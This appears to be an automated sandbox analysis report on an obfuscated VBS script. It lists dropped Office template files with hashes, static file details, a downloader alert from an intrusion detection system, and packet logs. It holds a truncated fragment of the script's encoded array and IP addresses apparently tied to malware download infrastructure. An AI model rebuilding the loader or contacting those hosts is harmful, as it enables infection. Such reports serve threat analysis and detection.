                                                                                                                                                        Size (bytes):294178
                                                                                                                                                        Entropy (8bit):4.977758311135714
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):270198
                                                                                                                                                        Entropy (8bit):5.073814698282113
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):217137
                                                                                                                                                        Entropy (8bit):5.068335381017074
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254875
                                                                                                                                                        Entropy (8bit):5.003842588822783
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                        MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):344303
                                                                                                                                                        Entropy (8bit):5.023195898304535
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250983
                                                                                                                                                        Entropy (8bit):5.057714239438731
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):51826
                                                                                                                                                        Entropy (8bit):5.541375256745271
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):47296
                                                                                                                                                        Entropy (8bit):6.42327948041841
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34415
                                                                                                                                                        Entropy (8bit):7.352974342178997
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3465076
                                                                                                                                                        Entropy (8bit):7.898517227646252
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8SOX9UN4LO3DU02SEO39.temp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12
                                                                                                                                                        Entropy (8bit):0.41381685030363374
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/l:
                                                                                                                                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:............

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ESG2NPUCNXZX1VE2HFK7.temp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12
                                                                                                                                                        Entropy (8bit):0.41381685030363374
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/l:
                                                                                                                                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:............

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12
                                                                                                                                                        Entropy (8bit):0.41381685030363374
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/l:
                                                                                                                                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:............

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF35564.TMP (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12
                                                                                                                                                        Entropy (8bit):0.41381685030363374
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/l:
                                                                                                                                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:............

                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):55
                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:ASCII text, with very long lines (2459), with CRLF line terminators
                                                                                                                                                        Entropy (8bit):3.741424554315856
                                                                                                                                                        TrID:
                                                                                                                                                          File name:YinLHGpoX4.vbs
                                                                                                                                                          File size:2'756 bytes
                                                                                                                                                          MD5:1c13faf06926c36c9b8abc23ab38e1eb
                                                                                                                                                          SHA1:4085a7d8203165b83cd7283348a775d5db0ffbe1
                                                                                                                                                          SHA256:4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c
                                                                                                                                                          SHA512:74b713d8542dd17046cc7083cc1a15c3d0226c0cf7a10cd24eb4fd790a7376b66d819aca4b95d7a496282bf6fcfa0e67e06200930021a3dfe48e512ea33a4eba
                                                                                                                                                          SSDEEP:48:6pRrwS1uNbcrcpwVB6yxLihr07wjl6yLnxiJIl0yxEtF:6pBwS1utpwVBOawjl9y0u
                                                                                                                                                          TLSH:AC51C61D088B4C64DBEB784DB526A5EFC7B1430F1D9BA89283B0AE7C6A1723E41F4056
                                                                                                                                                          File Content Preview:dwo13tz1lzdja89e = Array(669, 716, 703, 699, 718, 703, 681, 700, 708, 703, 701, 718, 642, 636, 689, 685, 701, 716, 707, 714, 718, 648, 685, 706, 703, 710, 710, 636, 643, 648, 684, 719, 712, 634, 636, 714, 713, 721, 703, 716, 717, 706, 703, 710, 710, 648,

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:68d69b8f86ab9a86

                                                                                                                                                          Network Behavior

                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-12-19T12:51:39.349425+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449754202.71.109.228443TCP

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 19, 2024 12:50:48.134315014 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:48.134373903 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:48.134453058 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:48.158431053 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:48.158462048 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.411134005 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.411283016 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:49.449084997 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:49.449136972 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.449548960 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.491602898 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:49.546605110 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:49.591336012 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.878470898 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.912734985 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.912750006 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.912791014 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:50:49.912870884 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                          Dec 19, 2024 12:50:49.912909031 CET44349730107.161.23.150192.168.2.4
